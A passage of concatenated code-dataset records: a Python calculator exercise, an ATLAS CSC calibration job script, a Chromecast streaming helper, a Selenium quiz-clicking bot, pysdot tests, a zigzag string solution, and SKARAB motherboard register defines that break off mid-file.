знака. Предусмотреть реакции на возможный\n# неверный знак операции, а также на ввод Y=0 при делении.\n# Организовать возможность многократных вычислений без\n# перезагрузки программа (т.е. построить бесконечный цикл).\n# В качестве символа прекращения вычислений принять ‘0’ (т.е. sign='0').\n\n# Список знаков, которые может обработать программа\nsign_list = ['+', '-', '*', '/']\n\nwhile True:\n X = input('Введите X: ')\n Y = input('Введите Y: ')\n\n # Проверяем X и Y - являются ли числами, если не являются,\n # выводится предупреждение и заново выводится запрос на ввод чисел\n if X.isdigit() and Y.isdigit():\n X = int(X)\n Y = int(Y)\n else:\n print('Проверьте введенные данные: X и Y должны быть числами')\n continue\n\n # Вводится знак операции\n sign = input('Введите знак операции: ')\n\n # 1) Если знак в списке знаков - вычисляет\n if sign in sign_list:\n if sign == sign_list[0]:\n Z = X + Y\n\n if sign == sign_list[1]:\n Z = X - Y\n\n if sign == sign_list[2]:\n Z = X * Y\n\n # Если это знак деления и Y не равно 0, то будет вычислять, если Y = 0,\n # то вывести предупреждение и начать программу заново\n if sign == sign_list[3] and Y != 0: # неверно\n Z = X / Y\n elif Y == 0:\n print('Делить на ноль нельзя!')\n continue\n\n # 2) Если знак = 0, прекращает работу программы\n elif sign == '0':\n print('Программа завершена')\n break\n\n # 3) Если знака в списке знаков нет - просит проверить знак\n else:\n print('Проверьте правильность введенного знака')\n continue\n\n # Вывод конечного результата\n print(Z)\n continue","sub_path":"HW/HW06/task_6_1.py","file_name":"task_6_1.py","file_ext":"py","file_size_in_byte":2697,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"515609676","text":"# Copyright (C) 2002-2020 CERN for the benefit of the ATLAS collaboration\n\n###############################################################\n# author Caleb Lampen lampen@physics.arizona.edu \n#\n# cscWritePedCool.py\n# Standard script to update CSC UPD1 pedestal tags\n#==============================================================\n#Input calibration text file\nif(\"input\" not in dir()):\n input = \"/raid02/lampen/datasets/csc/pedRuns/nov/pedestal.cal\"\n#Output db file name\nif(\"output\" not in dir()):\n output = \"cscPed.db\"\n#Should be \"COMP200\" or \"OFLP200\"\nif(\"dbname\" not in dir()):\n dbname = \"COMP200\"\n#Csc tag that will be used for any merging\nif(\"mergeCscTag\" not in dir()):\n mergeCscTag = \"Csc-ES1-002-00\"\n\nIOVRunStart=0\n\n#use McEventSelector\nDetDescrVersion = \"ATLAS-GEONTF-08-00-00\"\n\nimport AthenaCommon.AtlasUnixStandardJob\nfrom AthenaCommon.AppMgr import theApp\ntheApp.EvtMax =1 \n\nfrom AthenaCommon.AlgSequence import AlgSequence\ntopSequence = AlgSequence()\n\n#switch Inner Detector and/or Calorimeter if needed\n# DetFlags modifications are best set here (uncomment RecExCommon_flags first)\n#from AthenaCommon.GlobalFlags import GlobalFlags\nfrom AthenaCommon.GlobalFlags import GlobalFlags\n#GlobalFlags.DetGeo.set_atlas()\n#GlobalFlags.DataSource.set_geant4()\nGlobalFlags.DetGeo.set_commis()\nGlobalFlags.DataSource.set_data()\n#inc (\"RecExCommon/RecExCommon_flags.py\")\ninclude (\"RecExCond/RecExCommon_flags.py\")\n\nfrom AthenaCommon.DetFlags import DetFlags\nDetFlags.detdescr.Muon_setOn()\nDetFlags.detdescr.ID_setOff()\nDetFlags.detdescr.LAr_setOff()\nDetFlags.detdescr.Tile_setOff()\nDetFlags.Print()\n\n#GlobalFlags.InputFormat.set_bytestream()\n\ninclude (\"RecExCond/AllDet_detDescr.py\")\n\n# Detector Initialization\nfrom AtlasGeoModel import SetGeometryVersion\nfrom GeoModelSvc.GeoModelSvcConf import GeoModelSvc\nfrom AtlasGeoModel import GeoModelInit\n\n\n\n#CscReadWRiteCoolStr is a wrapper for the CscCoolStrSvc. It will have the \n#flat file coppied to the database\nfrom MuonCondCool.MuonCondCoolConf import MuonCalib__CscReadWriteCoolStr\ntopSequence += MuonCalib__CscReadWriteCoolStr()\nCscReadWriteDatabase= MuonCalib__CscReadWriteCoolStr()\nCscReadWriteDatabase.Write=True\nCscReadWriteDatabase.iFiles=[input]\n\n#Define cool foldernames. These need to be given to both\n#CoolStrSvc and IovDbSvc\ngainFolder = \"/CSC/GAIN\"\npslopeFolder = \"/CSC/PSLOPE\"\nrslopeFolder = \"/CSC/RSLOPE\"\npedFolder \t= \"/CSC/PED\"\nnoiseFolder\t= \"/CSC/NOISE\"\nrmsFolder = \"/CSC/RMS\"\nf001Folder = \"/CSC/FTHOLD\"\ntholdFolder = \"/CSC/THOLD\"\npeaktFolder = \"/CSC/PEAKT\"\nwidthFolder = \"/CSC/WIDTH\"\nsat1Folder \t= \"/CSC/SAT1\"\nsat2Folder\t= \"/CSC/SAT2\"\npeakcFolder\t= \"/CSC/PEAKC\"\nsampleTimeRatioFolder\t= \"/CSC/SAMPLERATIO\"\noccupancyFolder\t= \"/CSC/OCCUPANCY\"\nstatFolder = \"/CSC/STAT\"\n\n#suspendCaching()\n\n# data is written to conditions database using OutputConditionsAlg\nfrom RegistrationServices.OutputConditionsAlg import OutputConditionsAlg\nOutCondAlg = OutputConditionsAlg(\"OutCondAlg\",\"dummy.root\")\n\n# List of things to be written.\n# Make sure that only the folders you actually want to write are\n# in this list. If something is in this list, and isn't in \n# the calibration file, the entire job will fail.\nprefix = \"CondAttrListCollection#\"\nOutCondAlg.ObjectList=[ \n#prefix + gainFolder, \n#prefix + pslopeFolder,\n#prefix + rslopeFolder,\nprefix + pedFolder,\nprefix + noiseFolder, \nprefix + rmsFolder,\nprefix + f001Folder,\n#prefix + f001Folder,\n#prefix + tholdFolder,\n#prefix + peaktFolder,\n#prefix + widthFolder,\n#prefix + sat1Folder , \n#prefix +sat2Folder, \n#prefix + peakcFolder,\n#prefix + sampleTimeRatioFolder,\n#prefix + occupancyFolder,\n#prefix + statFolder\n]\n\n#Taglist must be in same order as folder list!\nOutCondAlg.IOVTagList = [ \n#\"CscGain-sim-100-00\",\n#\"CscPslope-sim-000-01\",\n#\"CscRslope-temp-000-00\",\n\"CscPed-ES1-UPD1-002-00\",\n\"CscNoise-ES1-UPD1-002-00\",\n\"CscRms-ES1-UPD1-002-00\",\n\"CscFthold-ES1-UPD1-002-00\",\n#\"CscFthold-comm-ES1-UPD1-002-03\",\n#\"CscThold-test-000-00\",\n#\"CscPeakt-test-000-00\",\n#\"CscWidth-sim-100-00\",\n#\"CscSat1-sim-100-00\",\n#\"CscSat2-sim-100-00\",\n#\"CscPeakc-sim-100-00\",\n#\"CscSampleratio-sim-100-00\",\n#\"CscOccupancy-sim-100-00\",\n#\"CscStat-comm-002-01\"\n]\n\nOutCondAlg.WriteIOV=True\n# set the interval of validity for the file here\n# putting nothing for Run2 (uppser limit) falls back on default \n#which is to be valid for all run/event\nOutCondAlg.Run1=IOVRunStart\n#OutputConditionsAlg.Event1=0\n#OutputConditionsAlg.Run2=9999\n#OutputConditionsAlg.Event2=9999\n\n##############\nfrom IOVDbSvc.CondDB import conddb\nconddb.setGlobalTag('COMCOND-HLTP-002-00')\n#conddb.setGlobalTag(\"COMCOND-006-00\")\ninclude(\"RegistrationServices/IOVRegistrationSvc_jobOptions.py\")\n#conddb.setGlobalTag('DEFAULTCOND')\nfrom AthenaCommon.AppMgr import ServiceMgr\nServiceMgr.IOVRegistrationSvc.OverrideNames+=[\"Data\"]\nServiceMgr.IOVRegistrationSvc.OverrideTypes+=[\"String64k\"]\n#WARNING! This will APPEND to the end of the old database file! Not overwrite!\nServiceMgr.IOVDbSvc.dbConnection =\"sqlite://;schema=\" + output + \";dbname=\" + dbname\n#Should never be changed to True unless absolutely sure!!!\n#ServiceMgr.IOVRegistrationSvc.RecreateFolders = False\n\n\n###############\n#Set detector description\n#DetDescrVersion = \"ATLAS-Comm-01-00-00\"\ninclude (\"RecExCond/AllDet_detDescr.py\")\n\n# CscCoolStrSvc preps data to be sent to cool database\nfrom MuonCondSvc.CscCondDB import cscCondDB\n#Stop caching since we aren't interested in reading it out right now\n#cscCondDB.useLocalFile()\n#cscCondDB.SetupForNewFolder()\ncscCondDB.CscCoolStrSvc.DoCaching = True\ncscCondDB.CscCoolStrSvc.DoMerge = True\ncscCondDB.addPedFolders()\ncscCondDB.addRmsFolder()\ncscCondDB.addF001Folder()\nconddb.addOverride(\"/CSC\",mergeCscTag)\n#cscCondDB.addStatusFolder()\n#conddb.addOverride(\"/CSC/STAT\",\"CscStat-comm-002-00\")\n#cscCondDB.addStatusFolder()\n#ServiceMgr.MessageSvc.OutputLevel = DEBUG \nServiceMgr.MessageSvc.debugLimit = 0 \n#ServiceMgr.CscCoolStrSvc.OutputLevel = VERBOSE\n","sub_path":"MuonSpectrometer/MuonConditions/MuonCondGeneral/MuonCondCool/share/cscWritePedCool.py","file_name":"cscWritePedCool.py","file_ext":"py","file_size_in_byte":5904,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"644308083","text":"import os\nimport pychromecast\nimport time\nimport http.server\nimport socketserver, socket\nimport threading\nfrom utils import get_ip\n\n# Needs refactoring, hard to understand variables\ndef stream_to_chromecast(video_dir, subs):\n\n content_type = \"video/\" + os.path.splitext(video_dir)[1][1:]\n print(\"Searching for chromecasts...\")\n chromecasts = pychromecast.get_chromecasts()\n\n counter = 1\n for chromecast in chromecasts:\n print(str(counter) + \": \" + str(chromecast.device.friendly_name))\n\n cast_index = int(input(\"Select chromecast by number: \")) - 1\n\n if cast_index >= 0 and cast_index < len(chromecasts):\n chromecast = chromecasts[cast_index]\n else:\n print(\"Invalid index, aborting...\")\n return\n\n chromecast.wait()\n\n http_thread = threading.Thread(target=http_cast_server)\n http_thread.daemon = True\n http_thread.start()\n\n hostlink = get_ip()\n\n medialink = \"http://\" + hostlink + \":8080\" + video_dir\n subslink = \"http://\" + hostlink + \":8080\" + subs\n\n media_title = video_dir.split(\"/\")[-1]\n\n controller = chromecast.media_controller\n\n # Subtitles doesn't show up? :/\n controller.play_media(medialink,\n content_type,\n subtitles=subslink,\n subtitles_mime=\"text/srt\",\n title=media_title\n )\n\n controller.block_until_active()\n\n controller.enable_subtitle(1)\n\n # Add controller loop here\n while True:\n time.sleep(10)\n print(controller.status)\n\n\ndef http_cast_server():\n http_handler = http.server.SimpleHTTPRequestHandler\n\n with socketserver.TCPServer((\"\", 8080), http_handler) as httpd:\n httpd.serve_forever()\n\n","sub_path":"src/chromecast.py","file_name":"chromecast.py","file_ext":"py","file_size_in_byte":1734,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"437164346","text":"from selenium import webdriver\nimport time\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\n\ndriver = webdriver.Chrome(r\"C:\\Users\\Pavel\\Documents\\python\\lolClicker\\chromedriver.exe\")\nanswers = [\"Tryndamere\", \"FunPlus Phoenix\", \"SK Telecom T1\", \"2009\", \"Ezreal\", \"Graves\", \"Jönköping\", \"Marksman\", \"The blade dancer\", \"Fighter\", \"Kai'Sa\", \"Fnatic\", \"Viper\", \"Orb of Deception\",\n \"Paris\", \"08:00\", \"Tremors\", \"The prodigal explorer\", \"Caitlyn\", \"+75 Mana\", \"71:34 min\", \"Ornn\", \"Samira and Yone\", \"USA\", \"99\", \"Ryze\", \"2011\", \"110\", \"9\", \"The deceiver\", \"'40,000\", \"20:00\",\n \"Team Liquid\", \"213\", \"22\", \"Terrashape\", \"151\", \"The blind monk\", \"85,5%\", \"Named after Riot employees\", \"Jinx\", \"59\", \"Pantheon\", \"Bladework\", \"Gen.G\", \"Kled\", \"Garen\", \"Galio\",\n \"The titan of the depths\", \"23:33 min\", \"Katarina and Cassiopeia\", \"+3 life on-hit\", \"Kennen and Tahm Kench\", \"Pudong Football Stadium\"]\n\ncounter = 0\n\ndriver.maximize_window()\ndriver.get(r\"https://join.stagecast.se/api/web/code/3563/Md61PapT0Uh1PRxtriaLnoTuUEeYFnkkxYQ9\")\n\ndriver.switch_to.frame(\"frame\")\n\ncheckbox = WebDriverWait(driver, 20).until(EC.element_to_be_clickable((By.CLASS_NAME, \"mc-checkmark\")))\ncheckbox.click()\n\nstartButton = WebDriverWait(driver, 20).until(EC.element_to_be_clickable((By.CLASS_NAME, \"main-button\")))\nstartButton.click()\n\nplayAgainButton = WebDriverWait(driver, 20).until(EC.element_to_be_clickable((By.XPATH, '//button[text()=\"Play Again\"]')))\nplayAgainButton.click()\n\ntime.sleep(5)\n\nwhile True:\n for answer in answers:\n isFound = driver.find_elements_by_xpath('//span[text()=\"' + answer +'\"]')\n if len(isFound) > 0:\n print(\"Here\")\n time.sleep(0.4)\n isFound[0].click()\n time.sleep(0.55)","sub_path":"clicker.py","file_name":"clicker.py","file_ext":"py","file_size_in_byte":1853,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"175033482","text":"from pysdot.domain_types import ConvexPolyhedraAssembly\nfrom pysdot.radial_funcs import RadialFuncEntropy\nfrom pysdot.radial_funcs import RadialFuncInBall\nfrom pysdot.radial_funcs import RadialFuncUnit\nfrom pysdot import OptimalTransport\nimport numpy as np\nimport unittest\n\n\nclass TestOptimalTransport(unittest.TestCase):\n def setUp(self):\n self.domain = ConvexPolyhedraAssembly()\n self.domain.add_box([0, 0], [1, 1])\n\n def test_base_ot(self, nb_diracs=1000):\n for _ in range(100):\n ot = OptimalTransport(self.domain)\n\n # diracs\n ot.set_positions(np.random.rand(nb_diracs, 2))\n ot.set_weights(np.ones(nb_diracs))\n\n # optimal weights\n ot.adjust_weights()\n\n # integrals\n areas = ot.pd.integrals()\n self.assertAlmostEqual(np.min(areas), 1.0 / nb_diracs, places=6)\n self.assertAlmostEqual(np.max(areas), 1.0 / nb_diracs, places=6)\n\n # ot.pd.display_vtk(\"results/vtk/pd.vtk\")\n\n def test_ball_cut(self, nb_diracs=100):\n for _ in range(10):\n ot = OptimalTransport(self.domain, radial_func=RadialFuncInBall())\n\n positions = np.random.rand(nb_diracs, 2)\n positions[:, 1] *= 0.5\n\n radius = 0.25 / nb_diracs**0.5\n mass = np.pi * radius**2\n\n # diracs\n ot.set_positions(positions)\n ot.set_weights(np.ones(nb_diracs) * radius**2)\n ot.set_masses(np.ones(nb_diracs) * mass)\n\n # optimal weights\n ot.adjust_weights()\n\n ot.pd.display_vtk(\"results/pd.vtk\")\n\n # integrals\n areas = ot.pd.integrals()\n\n self.assertAlmostEqual(np.min(areas), mass, places=6)\n self.assertAlmostEqual(np.max(areas), mass, places=6)\n\n\nif __name__ == '__main__':\n np.random.seed(1)\n unittest.main()\n","sub_path":"tests/test_optimal_transport.py","file_name":"test_optimal_transport.py","file_ext":"py","file_size_in_byte":1894,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"624212894","text":"'''\nProblem: A string is written in a zigzag pattern on a given number of rows\nSolution: Observe index increasing properties on each column, and off columns; on each column, for row i: i + (numRows - 1)*2; for off-column elements (except the 1st and last column): i + (numRows -1 - i)*2\n'''\t\nif __name__ == '__main__':\n\tdef convert(s, numRows):\n\t\tresult = str()\n\t\tif numRows == 1:\n\t\t\tresult = s\n\t\telse:\n\t\t\tfor row in range(numRows):\n\t\t\t\tfor i in range(row, len(s), 2*(numRows - 1)):\n\t\t\t\t\tresult += s[i]\n\t\t\t\t\tif row > 0 and row < numRows-1 and i+2*(numRows-1-row) < len(s):\n\t\t\t\t\t\tresult += s[i + 2 *(numRows - 1 - row)]\n\t\treturn result\n\n\ts = 'PAYPALISHIRING'\n\tr1 = convert(s, 3)\n\tprint(r1)\n","sub_path":"6_zigZagConvension.py","file_name":"6_zigZagConvension.py","file_ext":"py","file_size_in_byte":689,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"201471126","text":"'''\nDescription:\nDefines for the Skarab Motherboard.\n - Includes\n \t- OPCCODES\n \t- PORTS\n \t- Register Masks\n \t- Data structures\n\n '''\n# SKARAB Port Addresses\nETHERNET_FABRIC_PORT_ADDRESS = 0x7148\nETHERNET_CONTROL_PORT_ADDRESS = 0x7778\nDEFAULT_SKARAB_MOTHERBOARD_IP_ADDRESS = \"10.0.7.2\" \n\n# Response packet timeout\nCONTROL_RESPONSE_TIMEOUT = 1000\n\n# BOARD REGISTER OFFSET\n# READ REGISTERS\nC_RD_VERSION_ADDR \t= \t0x0\nC_RD_BRD_CTL_STAT_0_ADDR = \t0x4\nC_RD_LOOPBACK_ADDR = \t0x8\nC_RD_ETH_IF_LINK_UP_ADDR = \t0xC\nC_RD_MEZZANINE_STAT_ADDR = \t0x10\nC_RD_USB_STAT_ADDR = \t0x14\nC_RD_SOC_VERSION_ADDR = \t0x18\nC_RD_THROUGHPUT_COUNTER\t=\t \t0x58\nC_RD_NUM_PACKETS_CHECKED_0 = 0x5C\nC_RD_NUM_PACKETS_CHECKED_1 = 0x60\nC_RD_NUM_PACKETS_CHECKED_2 = 0x64\nC_RD_MEZZANINE_CLK_FREQ_ADDR = 0x74\nC_RD_CONFIG_CLK_FREQ_ADDR = \t0x78\nC_RD_AUX_CLK_FREQ_ADDR = \t0x7C\n\n# WRITE REGISTERS\nC_WR_BRD_CTL_STAT_0_ADDR = \t\t\t\t0x4\nC_WR_LOOPBACK_ADDR = \t\t\t\t0x8\nC_WR_ETH_IF_CTL_ADDR = \t\t\t0xC\nC_WR_MEZZANINE_CTL_ADDR =\t\t\t\t\t0x10\nC_WR_FRONT_PANEL_STAT_LED_ADDR =\t\t\t0x14\nC_WR_BRD_CTL_STAT_1_ADDR =\t\t\t\t\t0x18\nC_WR_RAMP_SOURCE_DESTINATION_IP_3_ADDR = 0x58\nC_WR_RAMP_CHECKER_SOURCE_IP_3_ADDR = 0x5C\nC_WR_RAMP_SOURCE_DESTINATION_IP_2_ADDR = 0x60\nC_WR_RAMP_CHECKER_SOURCE_IP_2_ADDR = 0x64\nC_WR_RAMP_SOURCE_DESTINATION_IP_1_ADDR = 0x68\nC_WR_RAMP_CHECKER_SOURCE_IP_1_ADDR = 0x6C\nC_WR_RAMP_SOURCE_PAYLOAD_WORDS_ADDR = \t0x70\nC_WR_RAMP_SOURCE_DESTINATION_IP_0_ADDR = 0x74\nC_WR_RAMP_CHECKER_SOURCE_IP_0_ADDR = 0x78\nC_WR_NUM_PACKETS_TO_GENERATE =\t\t\t\t0x7C\n\n# REGISTER MASKS\nMEZZANINE_PRESENT =\t\t\t0x1\nMEZZANINE_FAULT =\t\t\t0x100\nMEZZANINE_INTERRUPT =\t\t0x10000\nMEZZANINE_ENABLE =\t\t\t0x1\nMEZZANINE_RESET =\t\t\t0x100\nMEZZANINE_USE_ON_BRD_CLK =\t0x10000\n\nMONITOR_ALERT =\t\t\t\t0x2\nFAN_CONTROLLER_ALERT =\t\t0x4\nFAN_CONTROLLER_FAULT =\t\t0x8\nGBE_PHY_LINK_UP =\t\t\t0x10\nROACH3_SHUTDOWN =\t\t\t0x80000000\nROACH3_FPGA_RESET =\t\t\t0x40000000\n\nFRONT_PANEL_STATUS_LED0 =\t\t0x1\nFRONT_PANEL_STATUS_LED1 =\t\t0x2\nFRONT_PANEL_STATUS_LED2 =\t\t0x4\nFRONT_PANEL_STATUS_LED3 =\t\t0x8\nFRONT_PANEL_STATUS_LED4 =\t\t0x10\nFRONT_PANEL_STATUS_LED5 =\t\t0x20\nFRONT_PANEL_STATUS_LED6 =\t\t0x40\nFRONT_PANEL_STATUS_LED7 =\t\t0x80\n\nBOARD_REG =\t\t\t\t0x1\nDSP_REG =\t\t\t\t0x2\n\nFLASH_MODE =\t\t\t0x0\nSDRAM_PROGRAM_MODE =\t0x1\nSDRAM_READ_MODE =\t\t0x2\n\nMB_ONE_WIRE_PORT =\t\t\t0x0\nMEZ_0_ONE_WIRE_PORT =\t\t0x1\nMEZ_1_ONE_WIRE_PORT =\t\t0x2\nMEZ_2_ONE_WIRE_PORT =\t\t0x3\nMEZ_3_ONE_WIRE_PORT =\t\t0x4\n\n# Command ID's (In Request Packet)\n# (Command ID in response = request packet ID + 1)\nWRITE_REG =\t\t\t\t\t\t0x0001\nREAD_REG =\t\t\t\t\t\t0x0003\nWRITE_WISHBONE =\t\t\t\t0x0005\nREAD_WISHBONE =\t\t\t\t\t0x0007\nWRITE_I2C =\t\t\t\t\t\t0x0009\nREAD_I2C =\t\t\t\t\t\t0x000B\nSDRAM_RECONFIGURE =\t\t\t\t0x000D\nREAD_FLASH_WORDS =\t\t\t\t0x000F\nPROGRAM_FLASH_WORDS =\t\t\t0x0011\nERASE_FLASH_BLOCK =\t\t\t\t0x0013\nREAD_SPI_PAGE =\t\t\t\t\t0x0015\nPROGRAM_SPI_PAGE =\t\t\t\t0x0017\nERASE_SPI_SECTOR =\t\t\t\t0x0019\nONE_WIRE_READ_ROM_CMD =\t\t\t0x001B\nONE_WIRE_DS2433_WRITE_MEM =\t\t0x001D\nONE_WIRE_DS2433_READ_MEM =\t\t0x001F\nDEBUG_CONFIGURE_ETHERNET =\t\t0x0021\nDEBUG_ADD_ARP_CACHE_ENTRY =\t\t0x0023\nGET_EMBEDDED_SOFTWARE_VERS =\t0x0025\nPMBUS_READ_I2C =\t\t\t\t0x0027\nSDRAM_PROGRAM =\t\t\t\t\t0x0029\nCONFIGURE_MULTICAST =\t\t\t0x002B\nDEBUG_LOOPBACK_TEST =\t\t\t0x002D\nQSFP_RESET_AND_PROG =\t\t\t0x002F\n\n#I2C BUS DEFINES\nMB_I2C_BUS_ID =\t\t\t\t\t0x0\nMEZZANINE_0_I2C_BUS_ID =\t\t0x1\nMEZZANINE_1_I2C_BUS_ID =\t\t0x2\nMEZZANINE_2_I2C_BUS_ID =\t\t0x3\nMEZZANINE_3_I2C_BUS_ID =\t\t0x4\n\n# STM I2C DEFINES\nSTM_I2C_DEVICE_ADDRESS =\t\t\t\t\t0x0C # 0x18 shifted down by 1 bit\nSTM_I2C_BOOTLOADER_DEVICE_ADDRESS =\t\t\t0x08 # 0x10 shifted down by 1 bit\n\n# PCA9546 DEFINES\nPCA9546_I2C_DEVICE_ADDRESS =\t0x70\t# Address without read/write bit\nFAN_CONT_SWITCH_SELECT =\t\t0x01\nMONITOR_SWITCH_SELECT =\t\t\t0x02\nONE_GBE_SWITCH_SELECT =\t\t\t0x04\n\n# MAX31785 FAN CONTROLLER DEFINES\nSMBUS_ARA_ADDRESS =\t\t\t\t0x0C\t# Alert response address\nMAX31785_I2C_DEVICE_ADDRESS =\t0x52\t# Address without read/write bit\n\nTEMP_SENSOR_READING_FAULT =\t0x7FFF\n\n# MAX31785 FAN CONTROLLER PAGES\nLEFT_FRONT_FAN_PAGE =\t\t\t0\nLEFT_MIDDLE_FAN_PAGE =\t\t\t1\nLEFT_BACK_FAN_PAGE =\t\t\t2\nRIGHT_BACK_FAN_PAGE =\t\t\t3\nFPGA_FAN =\t\t\t\t\t\t4\n\nFPGA_TEMP_DIODE_ADC_PAGE =\t\t10\nFAN_CONT_TEMP_SENSOR_PAGE =\t\t12\nINLET_TEMP_SENSOR_PAGE =\t\t13\nOUTLET_TEMP_SENSOR_PAGE =\t\t14\n\nMEZZANINE_0_TEMP_ADC_PAGE =\t17\nMEZZANINE_1_TEMP_ADC_PAGE =\t18\nMEZZANINE_2_TEMP_ADC_PAGE =\t19\nMEZZANINE_3_TEMP_ADC_PAGE =\t20\n\nPLUS3V3AUX_ADC_PAGE =\t\t\t22\n\nALL_PAGES_PAGE =\t\t\t\t255\n\n# MAX31785 FAN CONTROLLER PMBUS COMMANDS\nPAGE_CMD =\t\t\t\t\t0x00\nCLEAR_FAULTS_CMD =\t\t\t0x03\nWRITE_PROTECT_CMD =\t\t\t0x10\nSTORE_DEFAULT_ALL_CMD =\t\t0x11\nRESTORE_DEFAULT_ALL_CMD\t =\t0x12\nCAPABILITY_CMD =\t\t\t0x19\nVOUT_MODE_CMD =\t\t\t\t0x20\nVOUT_SCALE_MONITOR_CMD =\t0x2A\nFAN_CONFIG_1_2_CMD =\t\t0x3A\nFAN_COMMAND_1_CMD =\t\t\t0x3B\nVOUT_OV_FAULT_LIMIT_CMD =\t0x40\nVOUT_OV_WARN_LIMIT_CMD =\t0x42\nVOUT_UV_WARN_LIMIT_CMD =\t0x43\nVOUT_UV_FAULT_LIMIT_CMD =\t0x44\nOT_FAULT_LIMIT_CMD =\t\t0x4F\nOT_WARN_LIMIT_CMD =\t\t\t0x51\nSTATUS_BYTE_CMD =\t\t\t0x78\nSTATUS_WORD_CMD =\t\t\t0x79\nSTATUS_VOUT_CMD =\t\t\t0x7A\nSTATUS_CML_CMD =\t\t\t0x7E\nSTATUS_MFR_SPECIFIC_CMD =\t0x80\nSTATUS_FANS_1_2_CMD =\t\t0x81\nREAD_VOUT_CMD =\t\t\t\t0x8B\nREAD_TEMPERATURE_1_CMD =\t0x8D\nREAD_FAN_SPEED_1_CMD =\t\t0x90\nPMBUS_REVISION_CMD =\t\t0x98\nMFR_ID_CMD =\t\t\t\t0x99\nMFR_MODEL_CMD =\t\t\t\t0x9A\nMFR_REVISION_CMD =\t\t\t0x9B\nMFR_LOCATION_CMD =\t\t\t0x9C\nMFR_DATE_CMD =\t\t\t\t0x9D\nMFR_SERIAL_CMD =\t\t\t0x9E\nMFR_MODE_CMD =\t\t\t\t0xD1\nMFR_VOUT_PEAK_CMD =\t\t\t0xD4\nMFR_TEMPERATURE_PEAK_CMD =\t0xD6\nMFR_VOUT_MIN_CMD =\t\t\t0xD7\nMFR_FAULT_RESPONSE_CMD =\t0xD9\nMFR_NV_FAULT_LOG_CMD =\t\t0xDC\nMFR_TIME_COUNT_CMD =\t\t0xDD\nMFR_TEMP_SENSOR_CONFIG_CMD =0xF0\nMFR_FAN_CONFIG_CMD =\t\t0xF1\nMFR_FAN_LUT_CMD =\t\t\t0xF2\nMFR_READ_FAN_PWM_CMD =\t\t0xF3\nMFR_FAN_FAULT_LIMIT_CMD =\t0xF5\nMFR_FAN_WARN_LIMIT_CMD =\t0xF6\nMFR_FAN_RUN_TIME_CMD =\t\t0xF7\nMFR_FAN_PWM_AVG_CMD =\t\t0xF8\nMFR_FAN_PWM2RPM_CMD =\t\t0xF9\n\n# UCD90120A VOLTAGE AND CURRENT MONITORING DEFINES\nUCD90120A_VMON_I2C_DEVICE_ADDRESS =\t0x45\t# Without read/write bit\nUCD90120A_CMON_I2C_DEVICE_ADDRESS =\t0x47\t# Without read/write bit\n\n# UCD90120A VOLTAGE MONITOR PAGES\nP12V2_VOLTAGE_MON_PAGE =\t\t\t0\nP12V_VOLTAGE_MON_PAGE =\t\t\t\t1\nP5V_VOLTAGE_MON_PAGE =\t\t\t\t2\nP3V3_VOLTAGE_MON_PAGE =\t\t\t\t3\nP2V5_VOLTAGE_MON_PAGE =\t\t\t\t4\nP1V8_VOLTAGE_MON_PAGE =\t\t\t\t5\nP1V2_VOLTAGE_MON_PAGE =\t\t\t\t6\nP1V0_VOLTAGE_MON_PAGE =\t\t\t\t7\nP1V8_MGTVCCAUX_VOLTAGE_MON_PAGE =\t8\nP1V0_MGTAVCC_VOLTAGE_MON_PAGE =\t\t9\nP1V2_MGTAVTT_VOLTAGE_MON_PAGE =\t\t10\nP3V3_CONFIG_VOLTAGE_MON_PAGE =\t\t11\n\n# UCD90120A CURRENT MONITOR PAGES\nP12V2_CURRENT_MON_PAGE =\t\t\t0\nP12V_CURRENT_MON_PAGE =\t\t\t\t1\nP5V_CURRENT_MON_PAGE =\t\t\t\t2\nP3V3_CURRENT_MON_PAGE =\t\t\t\t3\nP2V5_CURRENT_MON_PAGE =\t\t\t\t4\nP3V3_CONFIG_CURRENT_MON_PAGE =\t\t5\nP1V2_CURRENT_MON_PAGE =\t\t\t\t6\nP1V0_CURRENT_MON_PAGE =\t\t\t\t7\nP1V8_MGTVCCAUX_CURRENT_MON_PAGE =\t8\nP1V0_MGTAVCC_CURRENT_MON_PAGE =\t\t9\nP1V2_MGTAVTT_CURRENT_MON_PAGE =\t\t10\nP1V8_CURRENT_MON_PAGE =\t\t\t\t11\n\n# 88E1111 GBE DEFINES\nGBE_88E1111_I2C_DEVICE_ADDRESS =\t0x58\t# Without read/write bit\n\n# FT4232H DEFINES\nFT4232H_RESET_USB =\t\t\t\t\t\t0x02\nFT4232H_USB_JTAG_CONTROL =\t\t\t\t0x08\nFT4232H_USB_I2C_CONTROL =\t\t\t\t0x20\nFT4232H_FPGA_ONLY_JTAG_CHAIN =\t\t\t0x40\nFT4232H_INCLUDE_MONITORS_IN_JTAG_CHAIN =0x80\n\n# Command Packet Structures\n\n#Command Header\nclass sCommandHeader(object):\n\tdef __init__(self, commandID, seqNum):\n\t\tself.uCommandType = commandID\n\t\tself.uSequenceNumber = seqNum\n\n# WRITE_REG\nclass sWriteRegReq(object):\n\tdef __init__(self, commandID, seqNum, BoardReg, RegAddr, RegDataHigh, RegDataLow):\n\t\tself.Header = sCommandHeader(commandID, seqNum)\n\t\tself.uBoardReg = BoardReg\n\t\tself.uRegAddress = RegAddr\n\t\tself.uRegDataHigh = RegDataHigh\n\t\tself.uRegDataLow = RegDataLow\n\nclass sWriteRegResp(object):\n\tdef __init__(self, commandID, seqNum, BoardReg, RegAddr, RegDataHigh, RegDataLow, Padding):\n\t\tself.Header \t = sCommandHeader(commandID, seqNum)\n\t\tself.uBoardReg \t = BoardReg\n\t\tself.uRegAddress = RegAddr\n\t\tself.uRegDataHigh = RegDataHigh\n\t\tself.uRegDataLow = RegDataLow\n\t\tself.uPadding \t = Padding\n\n#READ_REG\nclass sReadRegReq(object):\n\tdef __init__(self, commandID, seqNum, BoardReg, RegAddr):\n\t\tself.Header = sCommandHeader(commandID, seqNum)\n\t\tself.uBoardReg \t = 